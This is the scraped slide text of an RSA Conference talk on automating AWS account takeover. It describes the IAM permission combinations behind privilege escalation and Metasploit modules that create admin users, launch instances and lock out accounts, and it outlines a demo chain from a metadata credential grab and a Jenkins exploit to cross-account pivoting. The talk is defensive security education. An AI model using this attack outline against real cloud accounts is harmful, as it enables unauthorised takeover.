Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Dev secops on the offense automating amazon web services account takeover


Published on

Source : RSA Conference

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Dev secops on the offense automating amazon web services account takeover

  1. 1. SESSION ID:SESSION ID: #RSAC Javier Godinez DevSecOps on the Offense: Automating Amazon Web Services Account Takeover IDY-W10 Founding Member @isomorphix Ian Allison Founding Member @iallison
  2. 2. #RSAC Disclaimer 2 This is not an Amazon Web Services (AWS) issue This is a DevOps education issue It is the user’s responsibility to understand the technology being used With power user privileges come great responsibilities
  3. 3. #RSAC How our Grandfathers Ran a Stack 3 Glen Beck (background) and Betty Snyder (foreground) program ENIAC in BRL building 328. (U.S. Army photo)
  4. 4. #RSAC How our Mothers Ran a Stack 4 Lawrence Livermore National Laboratory [Attribution], via Wikimedia Commons
  5. 5. #RSAC © 2007 Nuno Pinheiro & David Vignoni & David Miller & Johann Ollivier Lapeyre & Kenneth Wimer & Riccardo Iaconelli / KDE, via Wikimedia Commons 5 aws ec2 run-instances ami-12345678 -t m3.large -k $my-key-pair -g $my-security-group How We Run a Stack
  6. 6. #RSAC 6 Attack Surface + Misunderstanding of Technology == Low Hanging Fruit The Cloud is Ripe for the Picking
  7. 7. #RSAC Acceleration into the Cloud 7 Information Security Job Postings DevOps Jobs Postings
  8. 8. #RSAC Understanding the Technology You Use 8 How fast can I move while still staying safe? Always develop in separate account (Blast Radius Containment) Read the docs for everything and make conscious decisions and document those decisions Attackers will try to leverage everything against you Bleeding edge does not mean stable and secure. However, it can be with enough testing
  9. 9. #RSAC Instance 9 Virtual host Virtual environment on Xen hypervisor Feels very much like a host running on bare metal Hypervisor Instance Operating System
  10. 10. #RSAC Metadata Service 10 Internal HTTP service that provides Instances information about its environemt Available from host at Provides temporary credentials to hosts with instance profiles Hypervisor Instance Metadata OS Instance OS
  11. 11. #RSAC Instance Profile 11 AWS construct that maps a role to an instance Instance may or may not have a profile associated with it Instance
  12. 12. #RSAC AWS Identity and Access Management Overview 12 Users Groups Roles Policies Effect Actions Resources Condition
  13. 13. #RSAC The Good 13 Policy is specifically created for the application Least privilege Made to be as granular as possible
  14. 14. #RSAC The Bad 14 ec2:* iam:* anything:*
  15. 15. #RSAC The Ugly 15 All Access Great for Development Really Bad for Security
  16. 16. #RSAC 16 What Does Ugly Really Look Like? The best way to determine whether you truly have an ugly duck is by exploiting the most dangerous vulnerabilities.
  17. 17. #RSAC How do we catch up? 17 Through automation with a dash of Ruby
  18. 18. #RSAC AWS Create IAM User (CIAMU) Module 18 Allows for the creation of a user with Admin Privileges to the AWS account Needs access to AWS Access Keys or Instance Role with: iam:CreateUser iam:CreateGroup iam:PutGroupPolicy iam:AddUserToGroup iam:CreateAccessKey If you have instances/instance roles with this combination of IAM privileges it’s very dangerous.
  19. 19. #RSAC AWS Launch Instances Module 19 Launches an EC2 instance with a Public IP Required Privileges: ec2:RunInstances ec2:ImportKeyPair ec2:CreateSecurityGroup ec2:AuthorizeSecurityGroupIngress ec2:Describe* Can launch instance with Instance Profile Can launch cluster of Instances Can automate tasks via bootstrap
  20. 20. #RSAC AWS IAM Account Lockout Module 20 Requires an IAM admin role (created by CIAMU module) Enumerates all users and access keys Accepts a user to keep Locks out all other accounts Allows security teams to protect potentially compromised accounts
  21. 21. #RSAC Demonstration Network Diagram
  22. 22. #RSAC Demonstration
  23. 23. #RSAC Upcoming Modules and Ongoing Projects 23 AWS IAM privilege enumeration module AWS Lambda module AWS s3 bucket and access enumeration module Cumulus Cloud Attack Toolkit AWS Google Cloud Platform Community
  24. 24. #RSAC 24 Helping you get from ugly to…
  25. 25. #RSAC How Apply This Knowledge 25 Read the AWS IAM Best Practices Documents: Monitor IAM actions using AWS CloudTrail Get creative with AWS services: Config + CloudWatch Events + Lambda Audit your AWS Account IAM Policies and Roles Red Team your applications and instances Think to yourself: “How would an attacker use this against me?” Use repeatable secure patterns: Help build awareness through community:
  26. 26. #RSAC Appendix Demo Slides 26
  27. 27. #RSAC Load Metasploit
  28. 28. #RSAC Use sshexec to gain a foothold
  29. 29. #RSAC Instantiate a shell
  30. 30. #RSAC Retrieve temporary credentials
  31. 31. #RSAC Enumerate the network
  32. 32. #RSAC Enumerate the Metadata service
  33. 33. #RSAC Enumerate the Metadata service
  34. 34. #RSAC Escalate privileges on account A
  35. 35. #RSAC Login
  36. 36. #RSAC Explore account
  37. 37. #RSAC Discover Networks
  38. 38. #RSAC Explore the network
  39. 39. #RSAC Discover services
  40. 40. #RSAC Setup a tunnel and scan for vulns
  41. 41. #RSAC Exploit Jenkins
  42. 42. #RSAC Retrieve temporary credentials
  43. 43. #RSAC Launch a new instance with Admin privs
  44. 44. #RSAC Launch a new instance with Admin privs
  45. 45. #RSAC Launch a new instance with Admin privs
  46. 46. #RSAC Establish a session with new host
  47. 47. #RSAC Establish a session with new host
  48. 48. #RSAC Establish a session with new host
  49. 49. #RSAC Escalate privileges on account B
  50. 50. #RSAC Open the console